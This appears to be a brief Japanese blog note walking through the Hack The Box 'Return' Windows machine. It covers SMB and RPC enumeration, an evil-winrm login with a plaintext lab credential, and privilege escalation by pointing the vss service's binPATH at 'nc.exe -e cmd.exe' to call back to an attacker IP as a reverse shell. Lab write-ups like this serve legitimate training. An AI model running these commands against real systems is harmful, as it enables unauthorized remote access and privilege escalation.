HTB_Return_Windows

walktroughs

enum4linux  smbの列挙

5985/tcp  winRM(HTTP) 

nc -lvnp 389

evil-winrm  Evil-WinRMは、WinRMサービスが有効で、資格情報とアクセス許可があるばあいに使えるリモートシェルプログラム。↓

画像に alt 属性が指定されていません。ファイル名: dtyodfgulhi.png

evil-winrm -i 10.10.11.108 -u svc-printer -p ‘1edFg43012!!’ls

services   サービスの列挙

net user svc-printer 権限を確認

nc.exeを設置

upload <ローカルパス><リモートパス>

download<リモートパス><ローカルパス>

【serv】upload /usr/share/windows-resources/binaries/nc.exe

【serv】sc.exe config vss binPATH=”C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2 1234″

【local】nc -vlnp 1234

【serv】sc.exe start vss

download<リモートパス><ローカルパス>



rpcclient sambaのMS-RPC機能をテストするユーティリティ

メモ
スポンサーリンク
kotohaをフォローする
Step by Step

コメント